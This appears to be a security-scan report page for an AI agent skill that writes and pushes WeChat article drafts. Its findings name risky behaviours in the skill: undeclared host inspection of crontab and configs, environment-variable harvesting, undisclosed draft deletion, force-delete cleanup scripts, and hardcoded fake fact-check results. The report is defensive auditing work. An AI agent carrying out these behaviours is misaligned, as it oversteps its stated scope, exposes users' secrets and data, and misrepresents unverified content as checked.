ClawHub

Wechat Allauto Gzh

Security checks across malware telemetry and agentic risk

Overview

This skill mostly matches its WeChat writing and draft-publishing purpose, but it also includes under-disclosed draft deletion, broad host inspection, and cleanup/Git scripts that users should review before installing.

Install only if you intend to let the agent handle WeChat Official Account drafts. Use a dedicated low-privilege WeChat app credential if possible, keep AppSecret out of prompts and commits, review before any draft push/update/delete, and avoid running the cleanup/upload helper scripts unless you have verified the exact paths and effects.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (31)

Lp3

Medium
Category
MCP Least Privilege
Confidence
93% confidence
Finding
The skill describes capabilities to read environment variables, inspect and write local files, access the network, and run shell commands, yet declares no permissions. This creates a transparency and consent failure: an agent could perform sensitive actions such as reading secrets, persisting data, cloning repositories, or invoking external services without users being clearly warned or the runtime being able to enforce least privilege.

Tp4

High
Category
MCP Tool Poisoning
Confidence
95% confidence
Finding
The declared purpose is article generation and WeChat draft publishing, but the guidance also includes broader host and account operations such as repository setup/push, deletion/cleanup, inspection of cron jobs and home-directory configs, and management of existing WeChat drafts. This mismatch is dangerous because it hides materially different behaviors behind a benign description, increasing the chance that users or platforms authorize the skill without understanding the true access and side effects.

Context-Inappropriate Capability

Medium
Confidence
89% confidence
Finding
The skill instructs the agent to clone a GitHub repository and install dependencies even though that is not necessary for a writing/publishing skill description. Pulling and executing external code expands the attack surface significantly, exposing the host to supply-chain compromise, malicious setup scripts, or unintended code execution.

Context-Inappropriate Capability

Medium
Confidence
92% confidence
Finding
The guidance recommends checking cron jobs and files in the user's home directory to infer operating mode. That is broader host inspection than needed for article generation and can expose unrelated personal or operational information from the local system.

Context-Inappropriate Capability

Medium
Confidence
90% confidence
Finding
The documented design includes inspecting host-level crontab, environment variables, configuration files, and systemd timers to infer operating mode, which exceeds what is necessary for article generation. This creates an unnecessary host reconnaissance capability that can expose system metadata and normalize broad local inspection in a content-writing skill.

Intent-Code Divergence

Medium
Confidence
96% confidence
Finding
The module advertises search-based verification via the Tavily API, but the implementation returns hardcoded mock search results and a fixed successful fact-verification response whenever an API key is present. In this skill’s context, that can cause the agent to present fabricated or unverified information as current and validated, which is a security-relevant integrity issue for automated content generation.

Context-Inappropriate Capability

Medium
Confidence
92% confidence
Finding
The module inspects crontab contents, systemd timers, local config files, and an environment variable to infer writing mode, which exceeds the stated scope of generating and formatting WeChat articles. This creates unnecessary host reconnaissance and privacy exposure, revealing operational details about the machine running the skill.

Context-Inappropriate Capability

Medium
Confidence
92% confidence
Finding
The generated HTML loads html2canvas and FileSaver from public CDNs at runtime, introducing a supply-chain and network-dependency risk into a local cover-generation workflow. If the CDN content is tampered with, blocked, or replaced, opening the generated file in a browser could execute untrusted JavaScript with access to the page context and potentially local browser-exposed data.

Intent-Code Divergence

Medium
Confidence
95% confidence
Finding
The converter claims to produce 'WeChat-safe HTML', but user-controlled link and image URLs are inserted directly into href and src attributes without scheme validation, escaping for attribute context, or allowlisting. In a content-generation skill that turns arbitrary user Markdown into publishable HTML, this can enable unsafe links, tracking/exfiltration URLs, or platform-specific script/payload vectors if the downstream renderer or editor is permissive.

Intent-Code Divergence

Medium
Confidence
91% confidence
Finding
The code defines SAFE_TAGS and SAFE_CSS as if output safety is enforced, but those controls are never actually applied to generated HTML. This is dangerous because it creates a false sense of sanitization while the converter still emits raw constructed HTML from untrusted Markdown transformations, increasing the chance that unsafe tags, attributes, or styles slip through as features evolve.

Description-Behavior Mismatch

Medium
Confidence
89% confidence
Finding
The skill metadata describes automated article writing, theming, cover generation, and pushing drafts, but this script adds a destructive draft-deletion capability that is outside that stated scope. In an agent skill context, undocumented account-management actions are dangerous because users may invoke the skill expecting content generation, while the code can also remove existing assets from their WeChat account.

Context-Inappropriate Capability

Medium
Confidence
93% confidence
Finding
The code can permanently delete existing WeChat drafts, which is a destructive account-management action not required for the advertised purpose of article generation and formatting. In this context that mismatch increases risk because a writing assistant should not silently possess broader powers over a user's publishing backlog without clear disclosure and safeguards.

Context-Inappropriate Capability

Medium
Confidence
88% confidence
Finding
This script performs repository cleanup and local Git initialization/committing, which is unrelated to the declared WeChat article generation skill and expands the skill's capabilities into filesystem modification and source-control operations. In the context of an agent skill, such out-of-scope behavior is dangerous because it can delete local directories/files and package potentially sensitive project contents into a commit without being necessary for the advertised user task.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The README promotes one-click pushing of generated content to a WeChat public account draft box but does not clearly warn users that content and metadata will be transmitted to an external platform and may trigger account-side effects. In an agent-driven workflow, this omission increases the chance of users authorizing publication-related actions without understanding the privacy and operational consequences.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The README instructs users to place AppID and AppSecret in environment configuration without warning that these are sensitive credentials that can enable unauthorized access to the user's WeChat integration if exposed. In a skill intended for automation, missing credential-handling guidance materially increases the risk of accidental secret leakage through commits, logs, screenshots, or shared environment files.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The OpenClaw workflow description says the agent will automatically generate and push content to the WeChat draft box, but it does not warn that this is an external action performed on the user's behalf. That is risky in an agent context because users may interpret the feature as local content generation only, while the skill can actually affect a third-party account.

Missing User Warnings

Medium
Confidence
87% confidence
Finding
The skill persists generated articles, metadata, and covers to local output files without prominently warning the user. This can leak sensitive drafts, unpublished content, internal references, or account-related metadata onto disk where other users, backups, or later processes may access it.

Missing User Warnings

High
Confidence
96% confidence
Finding
The skill asks users to configure AppID/AppSecret and send article content to WeChat APIs without explicit security and privacy warnings. This is dangerous because it involves transmitting credentials and potentially sensitive unpublished content to an external service, and users are not clearly informed about exposure, storage, or misuse risks.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The skill recommends using Tavily for fact validation without warning that factual claims or article excerpts may be sent to a third-party search provider. This can disclose confidential draft content or sensitive topics to an external service outside the user's expectations.

Missing User Warnings

Medium
Confidence
88% confidence
Finding
The checklist tells users to run several recursive and force-delete commands against absolute local paths, including deleting directories and special files, but it does not clearly warn about irreversible data loss or advise verifying the target path before execution. In a repository upload checklist, this increases the chance of accidental destruction of local files if the path is mistyped, copied into the wrong environment, or adapted unsafely by users.

Vague Triggers

Medium
Confidence
93% confidence
Finding
The invocation phrase '我想写一篇关于[主题]的文章' is extremely broad and overlaps with normal writing requests, so the skill may activate when a user simply wants generic writing help rather than this specific automation workflow. In an agent environment, overly generic triggers can cause unintended execution of file operations, web research, and workflow steps without the user clearly opting into this skill.

Vague Triggers

Medium
Confidence
89% confidence
Finding
The review trigger phrase '请审校这篇文章,降低AI味' is ambiguous because it resembles an ordinary editing request and does not clearly signal use of this specific skill. This can cause the skill to activate unexpectedly during normal conversation and initiate its internal review workflow when the user only intended standard feedback.

Vague Triggers

Medium
Confidence
87% confidence
Finding
The modification trigger phrase '请修改[具体要求]' is so generic that it matches routine assistant usage across many contexts. Because the skill also advertises automatic workflow behavior, this broad trigger can lead to unintended activation and hidden side effects such as reading project files or rewriting content under the skill's rules.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The README states that the system will automatically search personal materials and perform online research, but it does not provide a clear warning, consent flow, or data-handling boundaries. In this context, the skill is specifically designed to ingest personal writing archives and external content, so silent or poorly disclosed access creates meaningful privacy and confidentiality risk.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The overview advertises '一键推送草稿' and describes automatic upload/token/draft creation against the WeChat API, but it does not clearly warn that user content and images will be transmitted to external services or that remote draft state will be created/modified. In an agent context, missing disclosure around outbound data transfer and side effects can cause users to unknowingly publish sensitive content to a third-party platform or alter a production account.

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal